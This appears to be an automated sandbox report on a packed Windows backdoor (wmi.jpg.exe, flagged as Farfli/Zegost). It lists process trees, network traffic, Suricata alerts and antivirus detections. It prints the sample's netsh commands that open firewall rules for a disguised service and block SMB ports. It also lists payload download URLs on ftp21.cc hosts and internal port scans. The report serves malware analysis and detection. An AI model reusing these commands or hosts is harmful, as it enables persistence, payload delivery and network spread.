Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 3, 2024, 6:36 p.m.	July 3, 2024, 6:39 p.m.

Size	45.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5	`1953c97029337ec04a8d4b69911d843f`
SHA256	`cd8c11ec94b74fd3357e4b9ed00dfb2c1d94d9b1bba9f6fc4d6c415aa8437b96`
CRC32	`87B032F7`
ssdeep	`768:XKm1dZvlQNI897NooQ7l6f6VW+Y5/gtp/Xy8QcXa6953qWJKQtACa:XKIdZdQC4NS7wjfQp/Xy8pa67qNQqv`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description) UPX_Zero - UPX packed file

wmi.jpg.exe "C:\Users\test22\AppData\Local\Temp\wmi.jpg.exe"
3020
- netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
  612
- netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
  2184
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add policy name=Block
  2252
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add filterlist name=Filter1
  2324
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2400
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  284
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  1596
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block
  1044
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
  1220
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static set policy name=Block assign=y
  2532

Name	Response	Post-Analysis Lookup
www.362-com.com	A 1.226.84.135	1.226.84.135
152.134.208.175.in-addr.arpa
hook.ftp21.cc	A 211.108.60.155	211.108.60.155
www.4i7i.com	A 1.226.84.135	1.226.84.135
api6.my-ip.io
opendata.baidu.com	CNAME open.a.shifen.com A 45.113.194.127 A 45.113.194.189	45.113.194.189
download.microsoft.com	CNAME main.dl.ms.akadns.net CNAME download.microsoft.com.edgekey.net A 59.151.136.153 CNAME e12671.dscd.akamaiedge.net CNAME dlc-shim.trafficmanager.net	72.247.96.197
members.3322.org	CNAME members.3322.net A 118.184.169.48	118.184.169.48
api.ipify.org	A 104.26.13.205 A 172.67.74.152 A 104.26.12.205	172.67.74.152
web.362-com.com	A 110.11.158.238	110.11.158.238
ipv6-api.iproyal.com
ssl.ftp21.cc	A 218.57.129.51 A 211.108.60.155	211.108.60.155
gtxvdqvuweqs.com	A 16.162.201.176	16.162.201.176
down.ftp21.cc	A 119.203.212.165 A 107.189.29.100	107.189.29.100
api.iproyal.com	A 93.189.62.83 A 193.228.196.69	93.189.62.83

IP Address	Status	Action
1.226.84.135	Active	Moloch
104.26.13.205	Active	Moloch
110.11.158.238	Active	Moloch
118.184.169.48	Active	Moloch
119.203.212.165	Active	Moloch
16.162.161.106	Active	Moloch
16.162.201.176	Active	Moloch
164.124.101.2	Active	Moloch
211.108.60.155	Active	Moloch
218.57.129.51	Active	Moloch
45.113.194.127	Active	Moloch
51.161.196.188	Active	Moloch
59.151.136.153	Active	Moloch
93.189.62.83	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.102:62846 -> 164.124.101.2:53	2027758	ET DNS Query for .cc TLD	Potentially Bad Traffic
UDP 192.168.56.102:51405 -> 164.124.101.2:53	2027758	ET DNS Query for .cc TLD	Potentially Bad Traffic
TCP 119.203.212.165:80 -> 192.168.56.102:49173	2014819	ET INFO Packed Executable Download	Misc activity
TCP 119.203.212.165:80 -> 192.168.56.102:49173	2026537	ET HUNTING Suspicious EXE Download Content-Type image/jpeg	Potential Corporate Privacy Violation
TCP 119.203.212.165:80 -> 192.168.56.102:49173	2022053	ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2	A Network Trojan was detected
TCP 119.203.212.165:80 -> 192.168.56.102:49173	2023672	ET MALWARE JS/WSF Downloader Dec 08 2016 M4	A Network Trojan was detected
TCP 211.108.60.155:80 -> 192.168.56.102:49176	2026537	ET HUNTING Suspicious EXE Download Content-Type image/jpeg	Potential Corporate Privacy Violation
TCP 211.108.60.155:80 -> 192.168.56.102:49176	2022053	ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2	A Network Trojan was detected
TCP 211.108.60.155:80 -> 192.168.56.102:49176	2023672	ET MALWARE JS/WSF Downloader Dec 08 2016 M4	A Network Trojan was detected
TCP 192.168.56.102:49289 -> 192.168.0.112:445	2001569	ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection	Misc activity
UDP 192.168.56.102:53778 -> 8.8.8.8:53	2012171	ET INFO DYNAMIC_DNS Query to 3322.org Domain	Misc activity
UDP 192.168.56.102:58521 -> 164.124.101.2:53	2027758	ET DNS Query for .cc TLD	Potentially Bad Traffic
TCP 218.57.129.51:80 -> 192.168.56.102:49995	2026537	ET HUNTING Suspicious EXE Download Content-Type image/jpeg	Potential Corporate Privacy Violation
TCP 192.168.56.102:51515 -> 192.168.0.3:1433	2001583	ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection	Misc activity
TCP 192.168.56.102:53332 -> 51.161.196.188:443	2038968	ET INFO SSH-2.0-Go version string Observed in Network Traffic	Misc activity
TCP 192.168.56.102:55989 -> 192.168.0.159:135	2001581	ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection	Misc activity
TCP 192.168.56.102:59012 -> 192.168.15.42:445	2001569	ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection	Misc activity
UDP 192.168.56.102:50447 -> 164.124.101.2:53	2034196	ET INFO External IP Lookup Domain DNS Lookup (my-ip .io)	Potentially Bad Traffic
TCP 192.168.56.102:49182 -> 192.168.14.248:1433	2001583	ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection	Misc activity
UDP 192.168.56.102:55774 -> 8.8.8.8:53	2047702	ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup	Misc activity
UDP 192.168.56.102:55774 -> 164.124.101.2:53	2047702	ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49914 59.151.136.153:443	C=US, O=Microsoft Corporation, CN=Microsoft Azure RSA TLS Issuing CA 08	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=akamai.download.microsoft.com	2c:c1:3d:3d:70:5a:9a:56:25:7c:d3:41:93:bc:76:f2:78:8b:81:63
TLS 1.2 192.168.56.102:50161 93.189.62.83:443	C=US, O=Let's Encrypt, CN=E5	CN=api.iproyal.com	80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.102:51926 93.189.62.83:443	C=US, O=Let's Encrypt, CN=E5	CN=api.iproyal.com	80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.102:54901 93.189.62.83:443	C=US, O=Let's Encrypt, CN=E5	CN=api.iproyal.com	80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.102:51838 93.189.62.83:443	C=US, O=Let's Encrypt, CN=E5	CN=api.iproyal.com	80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.102:54395 93.189.62.83:443	C=US, O=Let's Encrypt, CN=E5	CN=api.iproyal.com	80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23

Command line console output was observed (6 events)

Time & API	Arguments	Status	Return
WriteConsoleA July 3, 2024, 6:36 p.m.	buffer: Ok. console_handle: 0x00000007	1	1
WriteConsoleA July 3, 2024, 6:36 p.m.	buffer: Ok. console_handle: 0x00000007	1	1
WriteConsoleA July 3, 2024, 6:36 p.m.	buffer: ERR IPsec[05010] : console_handle: 0x00000007	1	1
WriteConsoleA July 3, 2024, 6:36 p.m.	buffer: FilterList with name 'Filter1' already exists console_handle: 0x00000007	1	1
WriteConsoleA July 3, 2024, 6:36 p.m.	buffer: ERR IPsec[05019] : console_handle: 0x00000007	1	1
WriteConsoleA July 3, 2024, 6:36 p.m.	buffer: Policy with name 'Block' does not exist console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 3, 2024, 6:36 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://118.184.169.48/dyndns/getip
suspicious_features	Connection to IP address	suspicious_request	GET http://45.113.194.127/api.php?query=175.208.134.152&co=&resource_id=6006&oe=utf8
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://16.162.161.106:8080/api/node/ip_validate

Connects to a Dynamic DNS Domain (1 event)

domain

members.3322.org

Performs some HTTP requests (10 events)

request	GET http://down.ftp21.cc/445.jpg
request	GET http://hook.ftp21.cc/MpMgSvc.dll
request	GET http://hook.ftp21.cc/MpMgSvc.jpg
request	GET http://118.184.169.48/dyndns/getip
request	GET http://45.113.194.127/api.php?query=175.208.134.152&co=&resource_id=6006&oe=utf8
request	GET http://hook.ftp21.cc/Hooks.jpg
request	GET http://download.microsoft.com/download/E/4/1/E4173890-A24A-4936-9FC9-AF930FE3FA40/NDP461-KB3102436-x86-x64-AllOS-ENU.exe
request	GET http://ssl.ftp21.cc/64.jpg
request	GET http://down.ftp21.cc/Update.txt
request	GET http://16.162.161.106:8080/api/node/ip_validate

Foreign language identified in PE resource (1 event)

name

RT_VERSION

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0001f05c

size

0x000003fc

Looks up the external IP address (1 event)

domain

api.ipify.org

Creates executable files on the filesystem (1 event)

file	C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe

Creates a service (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceA July 3, 2024, 6:36 p.m.	service_start_name: start_type: 2 password: display_name: .NET Runtime Optimization Service v3.0.30317_X86 filepath: C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe service_name: clr_optimization_v3.0.30317_32 filepath_r: C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe desired_access: 983551 service_handle: 0x004fd2a8 error_control: 1 service_type: 16 service_manager_handle: 0x004fd230	1	5231272	0

A process created a hidden window (10 events)

Time & API	Arguments	Status	Return
ShellExecuteExW July 3, 2024, 6:36 p.m.	show_type: 0 filepath_r: netsh.exe parameters: advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow filepath: netsh.exe	1	1
ShellExecuteExW July 3, 2024, 6:36 p.m.	show_type: 0 filepath_r: netsh.exe parameters: advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow filepath: netsh.exe	1	1
ShellExecuteExW July 3, 2024, 6:36 p.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static add policy name=Block filepath: netsh.exe	1	1
ShellExecuteExW July 3, 2024, 6:36 p.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static add filterlist name=Filter1 filepath: netsh.exe	1	1
ShellExecuteExW July 3, 2024, 6:36 p.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP filepath: netsh.exe	1	1
ShellExecuteExW July 3, 2024, 6:36 p.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP filepath: netsh.exe	1	1
ShellExecuteExW July 3, 2024, 6:36 p.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP filepath: netsh.exe	1	1
ShellExecuteExW July 3, 2024, 6:36 p.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static add filteraction name=FilteraAtion1 action=block filepath: netsh.exe	1	1
ShellExecuteExW July 3, 2024, 6:36 p.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1 filepath: netsh.exe	1	1
ShellExecuteExW July 3, 2024, 6:36 p.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static set policy name=Block assign=y filepath: netsh.exe	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 3, 2024, 6:36 p.m.	process_identifier: 3020 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 69632 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x10001000 process_handle: 0xffffffff	1	0	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0000ac00', u'virtual_address': u'0x00014000', u'entropy': 7.9247492476299195, u'name': u'UPX1', u'virtual_size': u'0x0000b000'}

entropy

7.92474924763

description

A section with a high entropy has been found

entropy

0.966292134831

description

Overall entropy of this PE file is high

The executable is compressed using UPX (2 events)

section	UPX0				description	Section name indicates UPX
section	UPX1				description	Section name indicates UPX

Uses Windows utilities for basic Windows functionality (20 events)

cmdline	netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
cmdline	netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
cmdline	netsh.exe ipsec static add policy name=Block
cmdline	"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
cmdline	netsh.exe ipsec static add filterlist name=Filter1
cmdline	"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline	netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline	netsh.exe ipsec static add filteraction name=FilteraAtion1 action=block
cmdline	netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
cmdline	netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline	"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline	"C:\Windows\System32\netsh.exe" ipsec static add policy name=Block
cmdline	netsh.exe ipsec static set policy name=Block assign=y
cmdline	"C:\Windows\System32\netsh.exe" ipsec static set policy name=Block assign=y
cmdline	"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
cmdline	netsh.exe ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
cmdline	"C:\Windows\System32\netsh.exe" ipsec static add filterlist name=Filter1
cmdline	"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
cmdline	"C:\Windows\System32\netsh.exe" ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
cmdline	"C:\Windows\System32\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block

Connects to an IRC server, possibly part of a botnet

Communicates with host for which no DNS query was performed (2 events)

host	16.162.161.106
host	51.161.196.188

Installs itself for autorun at Windows startup (1 event)

service_name

clr_optimization_v3.0.30317_32

service_path

C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe

Operates on local firewall's policies and settings (4 events)

cmdline	"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline	netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline	netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline	"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow

Generates some ICMP traffic

File has been identified by 40 AntiVirus engines on VirusTotal as malicious (40 events)

Bkav	W32.AIDetectMalware
Elastic	malicious (moderate confidence)
Cynet	Malicious (score: 100)
CAT-QuickHeal	Trojan.Aksula.A
Cylance	Unsafe
VIPRE	Gen:Heur.Mint.Zard.30
Sangfor	Suspicious.Win32.Save.a
K7AntiVirus	Trojan ( 0040f7ad1 )
K7GW	Trojan ( 0040f7ad1 )
Cybereason	malicious.029337
Baidu	Win32.Trojan.Farfli.bg
ESET-NOD32	a variant of Win32/Farfli.JU
APEX	Malicious
BitDefender	Gen:Heur.Mint.Zard.30
MicroWorld-eScan	Gen:Heur.Mint.Zard.30
Rising	Backdoor.Farfli!1.B6C5 (CLASSIC)
Emsisoft	Gen:Heur.Mint.Zard.30 (B)
F-Secure	Trojan.TR/Crypt.FKM.Gen
DrWeb	Trojan.Siggen28.63607
McAfeeD	Real Protect-LS!1953C9702933
Trapmine	malicious.moderate.ml.score
FireEye	Generic.mg.1953c97029337ec0
Sophos	Mal/Behav-160
Ikarus	Backdoor.Win32.Zegost
Google	Detected
Avira	TR/Crypt.FKM.Gen
Kingsoft	malware.kb.b.958
Xcitium	Backdoor.Win32.Zegost.c@4m3x9i
Arcabit	Trojan.Mint.Zard.30
ZoneAlarm	VHO:Backdoor.Win32.Lotok.gen
Varist	W32/KillAV.AU.gen!Eldorado
AhnLab-V3	Trojan/Win32.OnlineGameHack.R2023
BitDefenderTheta	AI:Packer.8EFBDF1C1F
DeepInstinct	MALICIOUS
VBA32	BScope.TrojanDDoS.Macri
MAX	malware (ai score=87)
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Farfli.PZA!tr
CrowdStrike	win/malicious_confidence_100% (D)
alibabacloud	Backdoor:Win/Parite.C

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (50 out of 287 events)

dead_host	192.168.3.119:445
dead_host	192.168.12.223:445
dead_host	192.168.1.84:445
dead_host	192.168.15.160:445
dead_host	192.168.12.215:445
dead_host	192.168.0.224:445
dead_host	192.168.3.160:445
dead_host	192.168.16.99:445
dead_host	192.168.12.140:445
dead_host	192.168.0.173:445
dead_host	192.168.3.123:445
dead_host	192.168.1.59:445
dead_host	192.168.0.87:445
dead_host	192.168.16.80:445
dead_host	192.168.15.140:445
dead_host	192.168.1.101:445
dead_host	192.168.0.84:445
dead_host	192.168.16.149:445
dead_host	192.168.12.212:445
dead_host	192.168.0.90:445
dead_host	192.168.16.22:445
dead_host	192.168.12.138:445
dead_host	192.168.56.102:52244
dead_host	192.168.0.229:445
dead_host	192.168.12.251:445
dead_host	192.168.0.101:445
dead_host	192.168.0.249:445
dead_host	192.168.3.1:445
dead_host	192.168.12.252:445
dead_host	192.168.16.86:445
dead_host	192.168.0.246:445
dead_host	192.168.16.68:445
dead_host	192.168.16.5:445
dead_host	192.168.16.73:445
dead_host	192.168.15.235:445
dead_host	192.168.16.63:445
dead_host	192.168.16.155:445
dead_host	192.168.16.126:445
dead_host	192.168.0.141:445
dead_host	192.168.0.197:445
dead_host	192.168.16.47:445
dead_host	192.168.3.120:445
dead_host	192.168.3.122:135
dead_host	192.168.1.14:445
dead_host	192.168.0.29:445
dead_host	192.168.16.161:445
dead_host	192.168.0.132:445
dead_host	192.168.16.3:445
dead_host	192.168.1.66:445
dead_host	192.168.56.102:50067

wmi.jpg.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All